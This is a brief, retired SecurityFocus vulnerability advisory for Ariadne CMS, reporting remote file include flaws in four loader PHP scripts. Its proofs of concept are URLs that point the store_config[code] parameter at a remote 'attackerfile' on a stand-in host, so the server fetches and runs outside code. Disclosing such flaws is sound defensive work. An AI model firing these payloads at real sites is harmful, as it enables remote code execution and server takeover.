RETIRED: Ariadne CMS Multiple Remote File Include Vulnerabilities

Attackers can exploit this issue via a web client.

The following proofs of concept are available:

www.example.com/script_path/lib/includes/loader.cmd.php?store_config[code]=http://www.example.com/attackerfile
www.example.com/script_path/lib/includes/loader.ftp.php?store_config[code]=http://www.example.com/attackerfile
www.example.com/script_path/lib/includes/loader.soap.php?store_config[code]=http://www.example.com/attackerfile
www.example.com/script_path/lib/includes/loader.web.php?store_config[code]=http://www.example.com/attackerfile


 

Privacy Statement
Copyright 2010, SecurityFocus